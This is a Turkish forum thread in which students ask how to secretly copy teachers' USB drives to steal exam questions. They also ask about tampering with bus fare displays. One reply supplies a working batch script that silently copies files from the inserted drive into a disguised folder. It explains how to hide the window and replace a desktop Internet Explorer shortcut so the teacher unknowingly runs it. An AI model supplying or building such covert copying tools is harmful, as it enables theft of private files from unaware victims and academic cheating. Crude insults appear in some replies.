Oymaca Bir Kaç Soru(Kopya,Numaratör)
-
şimdi öncelikle merhaba :D
ilk sorum:
daha öncedende belirtttiğim gibi sınıfta pc war hojalar flash bellekler getirior ve sunum izletiorlar
AMAN DİKKAT!!:Biz bilioruzki bu belleklerin içinde sınav sorularıda var
BİNGO! evet dediğiniz gibi sorualrı çalabiliriz
asıl soru:pc ye bağladığımız bir flash belleğin içindeki bilgileri hiç bir şekilde sormadan pc ye kaydeden bir program war mı?
2:ieett lerde bulunan numaratörleri hepimiz biliriz biz her bindiğimiz otobüste fişlerini söküyoruz
peki ama bu kablolara bir vihaz bağlayıp istediğimiz bir şeyi yazırabilir miyiz
hadi kolay gelsin...
-
''pc ye bağladığımız bir flash belleğin içindeki bilgileri hiç bir şekilde sormadan pc ye kaydeden bir program war mı?''
kısmına varsa cvp bekliyorum.
topiğin geri kalan karekter topluluğuna ya bsg diyorum... -
ben bierden böyle program hatırlıom ama flash diskki ne kada rtakılı kalıo pc kasılır biraz belki aktarım yapılırken ama bi araştırııım bulursam veririm linki
-
la ben MS-Dos tan yazmıştım bu flash bellektekileri pc ye atmak için bi .bat dosyası. daha doğrusu MMC kartlar için yapmıştım ama aynı hesap, sonuçta bi sürücü olarak görünüyolar. ama prg evdeki pc de, şimdi baştan yazmak içinde vaktim yok. bi ara benim birader msn e gelirse ona söylerim yollar. kodlarıda yayınlarım.
-
aslına öle bi program kodlamak lazım :D
bi kısayol oluşturcaksın, formda gizli şekilde çalışcak ekranda görünmicek :D kısayola basınca dosyayı daha önce belirlediğin yere kopyalıycak :D
fikir benden üretim sizden :D boş zaman bulabilirsem bende üretir koyabilirim :D:D hadi rastgele...
-
herkez bi yorum yazmış ama yararlı bi link veren yok.
-
uchak bunu yazdı:
-----------------------------
-----------------------------bilen yok belki ondandır =)
-
hay a.q baktımda ben vista için hazırlamıştım, ama aynı mantıkla xp içinde hazırlayabilirsin copy veya xcopy komutlarını kullanarak, xp de robocopy komutu yok çünkü.
metin belgesini açıp içine bunları yazıyosun:
cls
robocopy f:\ c:\nvidia\mmc\winvista\mmc *.jpg /S /R:1 /W:0 /NFL /NDL /NJH /NJS
cls
robocopy f:\ c:\nvidia\mmc\winvista\mmc *.3gp /S /R:1 /W:0 /NFL /NDL /NJH /NJS
cls
robocopy f:\ c:\nvidia\mmc\winvista\mmc *.amr /S /R:1 /W:0 /NFL /NDL /NJH /NJSsonra da buna bi kısayol oluşturup, kısayolun özelliklerinden, pencere boyutunu ve yazı boyutunu minimum ayarlıyosun, açılınca ekranda küçücük bişi çıkıyo. Onun çıkmaması içinde yine kısayol ayarlarından simge durumunda aç diyosun, o sorunda ortadan kalkıyo. sonra bu kısayolu masaüstünde hocanın işine yarıcak, yani hocanın açacağı bişeyle değiştiriyosun, Internet explorer la mesela. hoca onu açınca karttaki, senin isteiğin uzantıya sahip dosyalar senin istediğin klasöre kopyalanıyo.
PanxeR bunu yazdı:
uchak bunu yazdı:
-----------------------------bilen yok belki ondandır =)
----------------------------
sende bi herboka atlama a.q